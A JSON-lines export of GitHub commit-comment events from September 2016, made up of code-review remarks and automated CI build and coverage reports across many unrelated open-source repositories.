{"id":"4584106202","type":"CommitCommentEvent","actor":{"login":"ericstj"},"repo":{"name":"SedarG/corefx"},"payload":{"comment":{"id":19080863,"position":null,"line":null,"path":null,"commit_id":"1eec49ca2d704f422e0c1c1aa112bdbcd4129c33","created_at":"2016-09-19T15:53:13Z","updated_at":"2016-09-19T15:53:13Z","body":"> it looks to me like, runtimes/aot/lib/netcore50 wins over lib/uap101. Is this expected? Is there anything that I can do about it?\r\n\r\nYes, that's correct.  NuGet always prefers the best-runtime qualified asset over an asset that isn't runtime-specific.  You could copy the uap101 asset into the runtime/aot/lib/uap10.1 folder.  That way you get the file in both places without cross-compiling. EG:\r\n```\r\n<ItemGroup>\r\n  <PackageTargetFramework Include=\"uap10.1\" />\r\n  <PackageTargetFramework Include=\"uap10.1\">\r\n    <TargetRuntime>aot</TargetRuntime>\r\n  </PackageTargetFramework>\r\n</ItemGroup>\r\n```"}},"created_at":"2016-09-19T15:53:13Z"}
{"id":"4584108955","type":"CommitCommentEvent","actor":{"login":"jcfr"},"repo":{"name":"MayeulChassagnard/CTK"},"payload":{"comment":{"id":19080876,"position":114,"line":458,"path":"Libs/Scripting/Python/Core/ctkAbstractPythonManager.cpp","commit_id":"f7f1d45b681755e39ba9ef59c8a6981e79a475a0","created_at":"2016-09-19T15:53:40Z","updated_at":"2016-09-19T15:53:40Z","body":"Being more explicit about the intent is important, you could either use better variable name or add comment in the code ... for example\r\n```\r\nQString line_code_without_last_dot = line_code.remove(line_code.lastIndexOf('.'), 1);\r\nQString code = QString(\"%1 = %2\").arg(instantiated_class_name).arg(line_code_without_last_dot);\r\n```"}},"created_at":"2016-09-19T15:53:40Z"}
{"id":"4584110819","type":"CommitCommentEvent","actor":{"login":"tudurom"},"repo":{"name":"6c37/crux-ports"},"payload":{"comment":{"id":19080881,"position":null,"line":null,"path":null,"commit_id":"9d7dfa966e66dfc2278d0061d13f6c232234a601","created_at":"2016-09-19T15:53:59Z","updated_at":"2016-09-19T15:53:59Z","body":"fixed in ae734bc5a759b59473e74100d2ae25662c28bdb9"}},"created_at":"2016-09-19T15:53:59Z"}
{"id":"4584113567","type":"CommitCommentEvent","actor":{"login":"ccrs"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19080885,"position":null,"line":null,"path":null,"commit_id":"c0dfbc4432e1958d0299f63a71f29472c3ea4059","created_at":"2016-09-19T15:54:29Z","updated_at":"2016-09-19T15:54:29Z","body":"check honor among thieves, iirc it has a cooldown hack\r\nrogue has area aura -> players can trigger their aura appli -> cooldown is added to players so they cannot trigger more than one proc each ... second? gosh my memory\r\nso yeah I guess the add cooldown and check part wont be necessary? worth checking eitherway"}},"created_at":"2016-09-19T15:54:29Z"}
{"id":"4584115202","type":"CommitCommentEvent","actor":{"login":"MingcongBai"},"repo":{"name":"AOSC-Dev/aosc-os-abbs"},"payload":{"comment":{"id":19080892,"position":8,"line":7,"path":"extra-android/android-platform-tools/autobuild/build","commit_id":"a30f69496a903eaaaf13d878640c15649f49c7bf","created_at":"2016-09-19T15:54:46Z","updated_at":"2016-09-19T15:54:46Z","body":"Hah."}},"created_at":"2016-09-19T15:54:46Z"}
{"id":"4584115439","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"AndrewSondey/my-personal-website"},"payload":{"comment":{"id":19080895,"position":38,"line":38,"path":"css/style.css","commit_id":"e8b3c6764b6f4ae7d8d0606496fcbfa1bb92b1df","created_at":"2016-09-19T15:54:48Z","updated_at":"2016-09-19T15:54:48Z","body":"Looks like you've got Times New Roman repeated twice, the second one in quotes is the correct way of writing it. Don't forget to use @fontface or an online service like google fonts so special fonts like Baskerville."}},"created_at":"2016-09-19T15:54:48Z"}
{"id":"4584116430","type":"CommitCommentEvent","actor":{"login":"jcfr"},"repo":{"name":"MayeulChassagnard/CTK"},"payload":{"comment":{"id":19080899,"position":151,"line":499,"path":"Libs/Scripting/Python/Core/ctkAbstractPythonManager.cpp","commit_id":"f7f1d45b681755e39ba9ef59c8a6981e79a475a0","created_at":"2016-09-19T15:55:00Z","updated_at":"2016-09-19T15:55:00Z","body":"Make sure to add bracket.\r\n\r\n```\r\nif (some_condition)\r\n  {\r\n  do();\r\n  }\r\n```\r\n\r\nshould be preferred."}},"created_at":"2016-09-19T15:55:00Z"}
{"id":"4584117400","type":"CommitCommentEvent","actor":{"login":"chrisma"},"repo":{"name":"hpi-swt2/wimi-portal"},"payload":{"comment":{"id":19080901,"position":null,"line":null,"path":null,"commit_id":"3ca42a95129f0995966d6891d2173b075ee78225","created_at":"2016-09-19T15:55:13Z","updated_at":"2016-09-19T15:55:13Z","body":"Nice! Thanks!\r\nRefering to the exact controller and the gist of the issue in the commit message might make it easier to read, e.g. `fix(TimeSheetController): redirect after timesheet submission, fix #441`\r\n"}},"created_at":"2016-09-19T15:55:13Z"}
{"id":"4584120048","type":"CommitCommentEvent","actor":{"login":"charleslim88"},"repo":{"name":"charleslim88/phase-0-tracks"},"payload":{"comment":{"id":19080907,"position":null,"line":null,"path":null,"commit_id":"486c0b6acdd5a3fa554feea5ee2e1d12e97f24e9","created_at":"2016-09-19T15:55:39Z","updated_at":"2016-09-19T15:55:39Z","body":"hey @mechamanny look at what i changed!"}},"created_at":"2016-09-19T15:55:39Z"}
{"id":"4584120721","type":"CommitCommentEvent","actor":{"login":"jcfr"},"repo":{"name":"MayeulChassagnard/CTK"},"payload":{"comment":{"id":19080911,"position":151,"line":499,"path":"Libs/Scripting/Python/Core/ctkAbstractPythonManager.cpp","commit_id":"f7f1d45b681755e39ba9ef59c8a6981e79a475a0","created_at":"2016-09-19T15:55:45Z","updated_at":"2016-09-19T15:55:45Z","body":"See http://www.commontk.org/index.php/Contributing_to_CTK#CTK_Coding_Style"}},"created_at":"2016-09-19T15:55:45Z"}
{"id":"4584121696","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19080913,"position":null,"line":null,"path":null,"commit_id":"5bf1348e99cef86f5941f473c7bb6016ab521fa2","created_at":"2016-09-19T15:55:55Z","updated_at":"2016-09-19T15:55:55Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1049](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13571&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 249, ignored: 3 Build time: 00:09:18"}},"created_at":"2016-09-19T15:55:55Z"}
{"id":"4584128389","type":"CommitCommentEvent","actor":{"login":"jawshooah"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":19080937,"position":null,"line":null,"path":null,"commit_id":"a212340cc1c7922b17c9ed35c01ea8bef05a9e9d","created_at":"2016-09-19T15:57:05Z","updated_at":"2016-09-19T15:57:05Z","body":"> duplicate application bundles\r\n\r\nWhere are you seeing those? We're moving app bundles, not copying them"}},"created_at":"2016-09-19T15:57:05Z"}
{"id":"4584131762","type":"CommitCommentEvent","actor":{"login":"wizz13150"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":19080942,"position":null,"line":null,"path":null,"commit_id":"68d98151798de1095290d0b504ce6ffae3e8a04a","created_at":"2016-09-19T15:57:41Z","updated_at":"2016-09-19T15:57:41Z","body":"Oops.\r\n\r\nOn line 172 : \r\n%ORDERBY%\": \"CLASSER PAR\",\r\n\r\nHorrible display. \"CLASSER P\"\r\nJust change this by \"Classer\" (no maj, bold if possible)\r\n\r\nty\r\n:)"}},"created_at":"2016-09-19T15:57:41Z"}
{"id":"4584134020","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"AndrewSondey/my-personal-website"},"payload":{"comment":{"id":19080946,"position":8,"line":8,"path":"portfolio.html","commit_id":"e8b3c6764b6f4ae7d8d0606496fcbfa1bb92b1df","created_at":"2016-09-19T15:58:05Z","updated_at":"2016-09-19T15:58:05Z","body":"Make sure you're using straight quote marks. The ones above for the meta attributes are curved and can cause problems."}},"created_at":"2016-09-19T15:58:05Z"}
{"id":"4584135748","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19080952,"position":null,"line":null,"path":null,"commit_id":"a820cc37abe28c4e8c26fa4fd62974ace93e2008","created_at":"2016-09-19T15:58:24Z","updated_at":"2016-09-19T15:58:24Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1050](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13572&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 9 (9 new), passed: 217, ignored: 3 Build time: 00:09:06\n### Failed tests\n```\norg.genivi.sota.device_registry.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\norg.genivi.sota.core.transfer.DeviceUpdatesSpec.when multiple packages are pending sorted by installPos: <no details avaliable>\n\norg.genivi.sota.core.transfer.DeviceUpdatesSpec.sets install priority for one package: <no details avaliable>\n\norg.genivi.sota.core.transfer.DeviceUpdatesSpec.rest of installation queue (consecutive installPos) remains Pending upon one package failing to install: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.GET update requests for a device returns a list of PendingUpdateResponse: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.PUT to set install order should change the package install order: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.GET update results for a vehicle returns a list of OperationResults: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.GET update results for an update request returns a list of OperationResults: <no details avaliable>\n\norg.genivi.sota.core.UpdateServiceSpec.queue an update for a single device creates an update request: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-19T15:58:24Z"}
{"id":"4584136006","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19080953,"position":null,"line":null,"path":null,"commit_id":"05c847b6db21e2fd8c9a4bd0482cecfc6a16a2a4","created_at":"2016-09-19T15:58:27Z","updated_at":"2016-09-19T15:58:27Z","body":"[Code coverage](https://122-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-19T15:58:27Z"}
{"id":"4584137683","type":"CommitCommentEvent","actor":{"login":"jcfr"},"repo":{"name":"MayeulChassagnard/CTK"},"payload":{"comment":{"id":19080955,"position":null,"line":null,"path":null,"commit_id":"f7f1d45b681755e39ba9ef59c8a6981e79a475a0","created_at":"2016-09-19T15:58:42Z","updated_at":"2016-09-19T15:58:42Z","body":"> will print stuff during the tabulation\r\n\r\nThis is not specific to your approach. It is specific to the code being executed.\r\n\r\nCurrently the console already capture the output. See https://github.com/commontk/CTK/blob/4481725aba45684ce90e47b93509e9cd1f6fcb19/Libs/Scripting/Python/Core/ctkAbstractPythonManager.cpp#L153-L156\r\n\r\nMay be you could look into setting the cursor location where you want the out to be displayed before execution  ... \r\n"}},"created_at":"2016-09-19T15:58:42Z"}
{"id":"4584141778","type":"CommitCommentEvent","actor":{"login":"airabinovich"},"repo":{"name":"airabinovich/java_petri_engine"},"payload":{"comment":{"id":19080966,"position":14,"line":14,"path":"src/Petri/PetriNode.java","commit_id":"30c98f66d89d286739ab18b6b32e0d33c9b58719","created_at":"2016-09-19T15:59:26Z","updated_at":"2016-09-19T15:59:26Z","body":"call setIndex to verify negative values"}},"created_at":"2016-09-19T15:59:26Z"}
{"id":"4584149820","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19080987,"position":null,"line":null,"path":null,"commit_id":"7441ac6bbaaeeb4dea94b13ca2476bb532ccf806","created_at":"2016-09-19T16:00:54Z","updated_at":"2016-09-19T16:00:54Z","body":"[Code coverage](https://123-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-19T16:00:54Z"}
{"id":"4584154811","type":"CommitCommentEvent","actor":{"login":"wizz13150"},"repo":{"name":"Lunat1q/Catchem-PoGo"},"payload":{"comment":{"id":19081001,"position":null,"line":null,"path":null,"commit_id":"68d98151798de1095290d0b504ce6ffae3e8a04a","created_at":"2016-09-19T16:01:44Z","updated_at":"2016-09-19T16:01:44Z","body":"Ok, just change all words with \"Poke\" to \"Poké\". There is no one accent here :)\r\nAnd not just for French translation. Pokémon is Pokémon, not Pokemon.\r\n\r\nTyy\r\n:)"}},"created_at":"2016-09-19T16:01:44Z"}
{"id":"4584155055","type":"CommitCommentEvent","actor":{"login":"taras"},"repo":{"name":"EduCaaS/UI"},"payload":{"comment":{"id":19081002,"position":null,"line":null,"path":null,"commit_id":"7dee3d276165299d1c83d03caef54f60db66abc3","created_at":"2016-09-19T16:01:47Z","updated_at":"2016-09-19T16:01:47Z","body":":) Yes, but I mean what was broken?"}},"created_at":"2016-09-19T16:01:47Z"}
{"id":"4584157463","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19081005,"position":null,"line":null,"path":null,"commit_id":"14ef3a4d5b4f6296327f647ceb02df5bde9aad93","created_at":"2016-09-19T16:02:15Z","updated_at":"2016-09-19T16:02:15Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1051](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13573&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 240, ignored: 3 Build time: 00:09:50"}},"created_at":"2016-09-19T16:02:15Z"}
{"id":"4584159782","type":"CommitCommentEvent","actor":{"login":"arjunguha"},"repo":{"name":"plasma-umass/Fission"},"payload":{"comment":{"id":19081011,"position":5,"line":47,"path":"jvm/src/main/scala/RhinoToQuark.scala","commit_id":"a90079807d43e0278a30bff2ee96a0bd46069a97","created_at":"2016-09-19T16:02:37Z","updated_at":"2016-09-19T16:02:37Z","body":"Let me take care of it. I'm programming in this region of code. \n\nSent from my phone\n\n> On Sep 19, 2016, at 11:10, rolivia <notifications@github.com> wrote:\n> \n> I'll change the name. This is the method I use to parse eval strings. I pass in all of the variables that are in scope, but I have to remove window and global because otherwise variables will be parsed as window. or global. (because of how the curVars thing works).\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-19T16:02:37Z"}
{"id":"4584161702","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19081013,"position":null,"line":null,"path":null,"commit_id":"2accdb1da3f7b7a266d2f014cb60171a6924a7fe","created_at":"2016-09-19T16:02:59Z","updated_at":"2016-09-19T16:02:59Z","body":"\nBuild report #161070916 for sha 2accdb1da3f7b7a266d2f014cb60171a6924a7fe:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-14.07%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-2391%20/%209922%20%2824.10%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-19.75%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/feature/unitests/)\n      "}},"created_at":"2016-09-19T16:02:59Z"}
{"id":"4584164216","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19081022,"position":null,"line":null,"path":null,"commit_id":"2accdb1da3f7b7a266d2f014cb60171a6924a7fe","created_at":"2016-09-19T16:03:27Z","updated_at":"2016-09-19T16:03:27Z","body":"\nBuild report #161071080 for sha 2accdb1da3f7b7a266d2f014cb60171a6924a7fe:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-14.07%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-2391%20/%209922%20%2824.10%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-19.75%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/master/)\n      "}},"created_at":"2016-09-19T16:03:27Z"}
{"id":"4584165174","type":"CommitCommentEvent","actor":{"login":"bryanwweber"},"repo":{"name":"Niemeyer-Research-Group/PyKED"},"payload":{"comment":{"id":19081027,"position":12,"line":20,"path":"pyked/chemked_schema.yaml","commit_id":"e7b90b278dc4227a4f555aba83c6f127be085026","created_at":"2016-09-19T16:03:37Z","updated_at":"2016-09-19T16:03:37Z","body":"IMHO, we should require molecular-structure and optionally allow InChI etc. that should validate to have the same molecular structure, if provided."}},"created_at":"2016-09-19T16:03:37Z"}
{"id":"4584168159","type":"CommitCommentEvent","actor":{"login":"javilonas"},"repo":{"name":"javilonas/Lonas_KL-SM-G901F"},"payload":{"comment":{"id":19081033,"position":null,"line":null,"path":null,"commit_id":"0667c57d8622b5430980206e75f76aa674a7fc6e","created_at":"2016-09-19T16:04:07Z","updated_at":"2016-09-19T16:04:07Z","body":"I have to finish others things, When I can I'll get on it. I can not Get Involved With anything more for now, I would not like to forget.\r\n\r\nA cordial greeting\r\n"}},"created_at":"2016-09-19T16:04:07Z"}
{"id":"4584170202","type":"CommitCommentEvent","actor":{"login":"dalareo"},"repo":{"name":"EduCaaS/UI"},"payload":{"comment":{"id":19081038,"position":null,"line":null,"path":null,"commit_id":"7dee3d276165299d1c83d03caef54f60db66abc3","created_at":"2016-09-19T16:04:28Z","updated_at":"2016-09-19T16:04:28Z","body":"I didn't check the log. I just saw translated strings not showing and rolling back to previous version did the trick."}},"created_at":"2016-09-19T16:04:28Z"}
{"id":"4584172678","type":"CommitCommentEvent","actor":{"login":"MaxNoe"},"repo":{"name":"fact-project/erna"},"payload":{"comment":{"id":19081045,"position":null,"line":null,"path":null,"commit_id":"1746897f5c50a9f526f0b40d95a78c78d8cd4a5c","created_at":"2016-09-19T16:04:53Z","updated_at":"2016-09-19T16:04:53Z","body":"You should use `yaml.safe_load`"}},"created_at":"2016-09-19T16:04:53Z"}
{"id":"4584178099","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"NosovArtem/helloworld"},"payload":{"comment":{"id":19081058,"position":18,"line":18,"path":"src/ru/sberbank/school/helloworld/tasks/lesson03/MyIterator.java","commit_id":"d7ee9fc71c72d3479994dbc3a2dbfee6d1e268d1","created_at":"2016-09-19T16:05:53Z","updated_at":"2016-09-19T16:05:53Z","body":"Лишние буковки - краткость здесь важнее - достаточно return index > 0"}},"created_at":"2016-09-19T16:05:53Z"}
{"id":"4584182877","type":"CommitCommentEvent","actor":{"login":"airabinovich"},"repo":{"name":"airabinovich/java_petri_engine"},"payload":{"comment":{"id":19081070,"position":25,"line":45,"path":"src/Petri/PetriNetFactory.java","commit_id":"0f04501e5beaa1f4c4beec0ffd46a74868421fb4","created_at":"2016-09-19T16:06:44Z","updated_at":"2016-09-19T16:06:44Z","body":"change to switch"}},"created_at":"2016-09-19T16:06:44Z"}
{"id":"4584184669","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"rjstever/rjstever-Personal-Website"},"payload":{"comment":{"id":19081073,"position":4,"line":4,"path":"css/style.css","commit_id":"4cbee37b81009c43fe4e5363d32b83c4a7fb56ee","created_at":"2016-09-19T16:07:03Z","updated_at":"2016-09-19T16:07:03Z","body":"Why are you declaring font-family twice?"}},"created_at":"2016-09-19T16:07:03Z"}
{"id":"4584185395","type":"CommitCommentEvent","actor":{"login":"airabinovich"},"repo":{"name":"airabinovich/java_petri_engine"},"payload":{"comment":{"id":19081076,"position":10,"line":95,"path":"test/unit_tests/PetriNetFactoryTestSuite.java","commit_id":"0f04501e5beaa1f4c4beec0ffd46a74868421fb4","created_at":"2016-09-19T16:07:12Z","updated_at":"2016-09-19T16:07:12Z","body":"change name to Factory for all tests"}},"created_at":"2016-09-19T16:07:12Z"}
{"id":"4584187677","type":"CommitCommentEvent","actor":{"login":"leonardorralves"},"repo":{"name":"connectbot/connectbot"},"payload":{"comment":{"id":19081081,"position":7,"line":31,"path":"app/src/main/java/org/connectbot/service/BackupAgent.java","commit_id":"eb4348a753ad0490c2b3e36e5b446f294c0bb2fa","created_at":"2016-09-19T16:07:35Z","updated_at":"2016-09-19T16:07:35Z","body":"cd newrelic\r\njava -jar newrelic.jar install"}},"created_at":"2016-09-19T16:07:35Z"}
{"id":"4584189049","type":"CommitCommentEvent","actor":{"login":"chrisma"},"repo":{"name":"hpi-swt2/wimi-portal"},"payload":{"comment":{"id":19081085,"position":10,"line":10,"path":"spec/features/time_sheets/visibility_for_responsible_wimi_spec.rb","commit_id":"c560f108cd9ac768a62b4ff0b23ff7c23e0f8eac","created_at":"2016-09-19T16:07:50Z","updated_at":"2016-09-19T16:07:50Z","body":"is the login necessary if we check using `expect(ability).to be_able_to`?"}},"created_at":"2016-09-19T16:07:50Z"}
{"id":"4584189206","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"rjstever/rjstever-Personal-Website"},"payload":{"comment":{"id":19081087,"position":28,"line":28,"path":"css/style.css","commit_id":"4cbee37b81009c43fe4e5363d32b83c4a7fb56ee","created_at":"2016-09-19T16:07:51Z","updated_at":"2016-09-19T16:07:51Z","body":"You could've use the shorthand for padding: `padding: 25px 10px;` which would set top and bottom to 25px and left and right to 10px."}},"created_at":"2016-09-19T16:07:51Z"}
{"id":"4584189616","type":"CommitCommentEvent","actor":{"login":"hianrodrigo"},"repo":{"name":"hianrodrigo/primeiro-projeto"},"payload":{"comment":{"id":19081089,"position":null,"line":null,"path":null,"commit_id":"419113afe7876d30b7a60727372943fdeaaa0a4d","created_at":"2016-09-19T16:07:56Z","updated_at":"2016-09-19T16:07:56Z","body":"`teste`"}},"created_at":"2016-09-19T16:07:56Z"}
{"id":"4584191891","type":"CommitCommentEvent","actor":{"login":"Rodigy1"},"repo":{"name":"Rodigy1/adam"},"payload":{"comment":{"id":19081098,"position":null,"line":null,"path":null,"commit_id":"bea652cf83f980a10e85e9159efa615e982136ff","created_at":"2016-09-19T16:08:22Z","updated_at":"2016-09-19T16:08:22Z","body":"Hello friends!\r\n"}},"created_at":"2016-09-19T16:08:22Z"}
{"id":"4584193933","type":"CommitCommentEvent","actor":{"login":"riccardi"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19081103,"position":66,"line":66,"path":"browser/js/cart/cart.js","commit_id":"d8d0cf174a58695ab782994e0ba69d4575148d13","created_at":"2016-09-19T16:08:43Z","updated_at":"2016-09-19T16:08:43Z","body":"do we need this second .then()?"}},"created_at":"2016-09-19T16:08:43Z"}
{"id":"4584194170","type":"CommitCommentEvent","actor":{"login":"bryanwweber"},"repo":{"name":"Niemeyer-Research-Group/PyKED"},"payload":{"comment":{"id":19081105,"position":8,"line":207,"path":"pyked/tests/test_validation.py","commit_id":"a3cf3210f2e23b5553b9d13ac48b128e3ba74351","created_at":"2016-09-19T16:08:46Z","updated_at":"2016-09-19T16:08:46Z","body":"I don't think we should give ORCID in the tests, unless we're specifically trying to test that functionality."}},"created_at":"2016-09-19T16:08:46Z"}
{"id":"4584194752","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"rjstever/rjstever-Personal-Website"},"payload":{"comment":{"id":19081106,"position":11,"line":11,"path":"index.html","commit_id":"4cbee37b81009c43fe4e5363d32b83c4a7fb56ee","created_at":"2016-09-19T16:08:52Z","updated_at":"2016-09-19T16:08:52Z","body":"Missing your alt attribute for the image."}},"created_at":"2016-09-19T16:08:52Z"}
{"id":"4584198275","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"rjstever/rjstever-Personal-Website"},"payload":{"comment":{"id":19081111,"position":18,"line":18,"path":"portfolio.html","commit_id":"4cbee37b81009c43fe4e5363d32b83c4a7fb56ee","created_at":"2016-09-19T16:09:22Z","updated_at":"2016-09-19T16:09:22Z","body":"Missing your alt attribute for your images."}},"created_at":"2016-09-19T16:09:22Z"}
{"id":"4584200459","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19081116,"position":null,"line":null,"path":null,"commit_id":"3f64c2f1453db26bd81a39b4ff0d99dfc4e134f0","created_at":"2016-09-19T16:09:43Z","updated_at":"2016-09-19T16:09:43Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#AUS252SXRvSAiAB_MChgtw"}},"created_at":"2016-09-19T16:09:43Z"}
{"id":"4584201902","type":"CommitCommentEvent","actor":{"login":"bryanwweber"},"repo":{"name":"Niemeyer-Research-Group/PyKED"},"payload":{"comment":{"id":19081120,"position":4,"line":40,"path":"pyked/validation.py","commit_id":"d3b6b7b267292c143d3fc2696d1775bcff221c5e","created_at":"2016-09-19T16:09:57Z","updated_at":"2016-09-19T16:09:57Z","body":"This change will cause a merge conflict with the `species` branch :cry:"}},"created_at":"2016-09-19T16:09:57Z"}
{"id":"4584202972","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"rjstever/rjstever-Personal-Website"},"payload":{"comment":{"id":19081123,"position":6,"line":6,"path":"index.html","commit_id":"4cbee37b81009c43fe4e5363d32b83c4a7fb56ee","created_at":"2016-09-19T16:10:10Z","updated_at":"2016-09-19T16:10:10Z","body":"I would add this before your style.css line to ensure it loads in time."}},"created_at":"2016-09-19T16:10:10Z"}
{"id":"4584204918","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"NosovArtem/helloworld"},"payload":{"comment":{"id":19081127,"position":33,"line":33,"path":"src/ru/sberbank/school/helloworld/tasks/lesson03/MyIterator.java","commit_id":"d7ee9fc71c72d3479994dbc3a2dbfee6d1e268d1","created_at":"2016-09-19T16:10:31Z","updated_at":"2016-09-19T16:10:31Z","body":"Здесь тоже нарушится контракт на remove.\r\nПравда стоит, конечно, учесть, что про эксепшены мы поговорим на следующем занятии."}},"created_at":"2016-09-19T16:10:31Z"}
{"id":"4584208180","type":"CommitCommentEvent","actor":{"login":"kyleniemeyer"},"repo":{"name":"Niemeyer-Research-Group/PyKED"},"payload":{"comment":{"id":19081131,"position":8,"line":207,"path":"pyked/tests/test_validation.py","commit_id":"a3cf3210f2e23b5553b9d13ac48b128e3ba74351","created_at":"2016-09-19T16:11:04Z","updated_at":"2016-09-19T16:11:04Z","body":"ok, that makes sense."}},"created_at":"2016-09-19T16:11:04Z"}
{"id":"4584210241","type":"CommitCommentEvent","actor":{"login":"kyleniemeyer"},"repo":{"name":"Niemeyer-Research-Group/PyKED"},"payload":{"comment":{"id":19081140,"position":12,"line":20,"path":"pyked/chemked_schema.yaml","commit_id":"e7b90b278dc4227a4f555aba83c6f127be085026","created_at":"2016-09-19T16:11:29Z","updated_at":"2016-09-19T16:11:29Z","body":"hmm, so all species should be defined, even if common?"}},"created_at":"2016-09-19T16:11:29Z"}
{"id":"4584212767","type":"CommitCommentEvent","actor":{"login":"chenchaohan"},"repo":{"name":"chenchaohan/shop"},"payload":{"comment":{"id":19081143,"position":null,"line":null,"path":null,"commit_id":"5f4ce1fe31827d876f0054b3d8367662fdbf8cd7","created_at":"2016-09-19T16:11:55Z","updated_at":"2016-09-19T16:11:55Z","body":"ok"}},"created_at":"2016-09-19T16:11:55Z"}
{"id":"4584213751","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"NosovArtem/helloworld"},"payload":{"comment":{"id":19081147,"position":19,"line":19,"path":"src/ru/sberbank/school/helloworld/tasks/lesson03/tasks/TaskFour.java","commit_id":"d7ee9fc71c72d3479994dbc3a2dbfee6d1e268d1","created_at":"2016-09-19T16:12:06Z","updated_at":"2016-09-19T16:12:06Z","body":"Используйте List + ListIterator или Deque + descendingIterator"}},"created_at":"2016-09-19T16:12:06Z"}
{"id":"4584218557","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19081157,"position":null,"line":null,"path":null,"commit_id":"e6372efd05472ce9051b34516a2de0d99b1a22da","created_at":"2016-09-19T16:12:59Z","updated_at":"2016-09-19T16:12:59Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1053](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13581&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-19T16:12:59Z"}
{"id":"4584219139","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19081159,"position":null,"line":null,"path":null,"commit_id":"14ef3a4d5b4f6296327f647ceb02df5bde9aad93","created_at":"2016-09-19T16:13:04Z","updated_at":"2016-09-19T16:13:04Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1052](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13580&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-19T16:13:04Z"}
